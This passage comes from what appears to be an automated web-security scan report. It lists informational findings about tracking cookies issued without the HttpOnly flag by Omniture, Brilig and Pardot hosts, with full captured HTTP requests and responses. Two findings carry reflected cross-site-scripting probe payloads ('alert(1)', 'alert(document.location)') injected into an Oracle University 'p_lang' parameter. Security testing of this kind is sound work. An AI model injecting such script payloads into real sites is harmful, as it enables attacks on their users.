Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.124. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

    s_vi_cx7Emox60ikx60cnmx60
    s_vi_fx7Bhjeljfd

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s0871958842035?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A33%202%20300&pageName=Search%3A%20All%3A%20Query&g=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&r=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&cc=USD&c20=New&v20=New&c24=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&v24=http%3A//www.oracle.com/us/sitemaps/sitemaps.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Error%3A404%3Ahttp%3A//www.oracle.com/us/sitemaps/sitemaps.html&pidt=1&oid=functiononclick%28event%29%7Bjavascript%3Adocument.searchForm.keyword.value%3D%27%27%7D&oidt=2&ot=TEXT&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?default=true&keyword=phone&start=1&nodeid=&fid=&showSimilarDoc=true&group=All
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|0-0|4E664230[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:34 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211D05010D53-4000010EC0480BA8|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:34 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:54:34 GMT
Last-Modified: Wed, 07 Sep 2011 15:54:34 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E66423A-1A91-321F443B"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www118
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.125. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

    s_vi_cx7Emox60ikx60cnmx60
    s_vi_x7Fbqsx7Cuex7Eyfubcydi

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oracleuniversity/1/H.19.4/s15873635162025?AQB=1&ndh=1&t=6/8/2011%2016%3A2%3A20%202%20300&pageName=OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage%3Fpage_id%3D501&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&ch=Search%20Test&c20=New&v20=New&c22=%28db_pages.getpage%3Fpage_id%3D501%29&c38=Non%20CMP%20-%20OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&c39=Non%20CMP%20-%20OUP%3A%201001%3A%20US%3A%20Oracle%20University%20%28db_pages.getpage%3Fpage_id%3D501%29&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=501
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:02:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:02:24 GMT
Last-Modified: Wed, 07 Sep 2011 16:02:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664410-12E6-6E8221CD"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www116
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.126. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s12042025583303?[AQB]&ndh=1&t=6/8/2011%2016%3A2%3A9%202%20300&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e2&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=772&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1
Host: oracleuniversity.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:02:10 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:10 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:02:10 GMT
Last-Modified: Wed, 07 Sep 2011 16:02:10 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664402-4052-4A49592A"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www362
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.127. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17226938849569?[AQB]&ndh=1&t=6/8/2011%2016%3A1%3A43%202%20300&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e2&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=772&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1
Host: oracleuniversity.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e2
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:01:44 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F40515867E-40000175C00034AB|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F40515867E-40000175C00034AE|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:01:44 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:01:44 GMT
Last-Modified: Wed, 07 Sep 2011 16:01:44 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6643E8-0CDE-17D956AD"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www374
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.128. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s17973330883993?[AQB]&ndh=1&t=6/8/2011%2016%3A2%3A31%202%20300&pageName=OUP%3A%201001%3A%20UScd6e276780&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e276780%2522%253balert%281%29//43d7466ae8e&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&ch=Show%20Desc%20Dynamic%20Page&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1
Host: oracleuniversity.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780%22%3balert(1)//43d7466ae8e
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:02:32 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:02:32 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:02:32 GMT
Last-Modified: Wed, 07 Sep 2011 16:02:32 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664418-4A55-7F3D450F"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www598
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.129. http://oracleuniversity.112.2o7.net/b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleuniversity.112.2o7.net
Path:   /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleuniversity,oracleglobal/1/G.7-Pd-R/s18104473613862?[AQB]&ndh=1&t=6/8/2011%2016%3A3%3A42%202%20300&pageName=OUP%3A%201001%3A%20UScd6e276780&g=http%3A//education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main%3Fp_org_id%3D1001%26p_lang%3DUScd6e276780%2522%253balert%28document.location%29//43d7466ae8e&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&ch=Show%20Desc%20Dynamic%20Page&cc=USD&s=1920x1200&c=16&j=1.3&v=Y&k=Y&bw=1069&bh=853&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&[AQE] HTTP/1.1
Host: oracleuniversity.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://education.oracle.com/pls/web_prod-plq-dad/webreg_course_index.main?p_org_id=1001&p_lang=UScd6e276780%22%3balert(document.location)//43d7466ae8e
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:03:43 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; Expires=Sun, 4 Sep 2016 16:03:43 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 16:03:43 GMT
Last-Modified: Wed, 07 Sep 2011 16:03:43 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E66445F-60B9-40E5F551"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www368
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.130. http://p.brilig.com/contact/bct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=d6b47090-0a45-4cd9-8cf9-d1081a8879d8&_ct=pixel&REDIR=rt.legolas-media.com/lgrt?ci=1%26ti=12%26sti=28%26sts=1315321126439961%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1
Host: p.brilig.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 06 Sep 2011 15:00:30 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 15:00:30 GMT
Set-Cookie: BriligContact=57372788-c194-43c5-a151-713a1d7fc584; Domain=.brilig.com; Expires=Thu, 29-Aug-2041 15:00:30 GMT
Location: http://rt.legolas-media.com/lgrt?ci=1&ti=12&sti=28&sts=1315321126439961&sui=fb069b82-5953-4473-8ae5-0a80415bcdc8
Content-Length: 0
X-Brilig-D: D=3410
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: text/plain


13.131. http://pi.pardot.com/analytics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pi.pardot.com
Path:   /analytics

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /analytics?ver=3&visitor_id=191471185&pi_opt_in=&campaign_id=1407&account_id=2852&title=Ecommerce%20Storefront%20Software%20%7C%20Online%20Storefront%20Software&browser=Chrome&browser_version=13&operating_system=Windows&language=en-US&screen_height=1200&screen_width=1920&flash=true&java=true&url=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Ffeature.aspx&referrer=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Fdefault.aspx%3Fpi_ad_id%3D7270542494%26gclid%3DCLLul7r4iKsCFQVrgwodzysJ5Q HTTP/1.1
Host: pi.pardot.com
Proxy-Connection: keep-alive
Referer: http://www.znode.com/znode-multifront/feature.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visitor_id3682=160859557; pardot=h5gc13lruog4br7fbhilcbhh31; visitor_id1852=191471185

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:33:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3p: CP="CAO DSP AND SO ON" policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding,User-Agent
Content-Length: 680
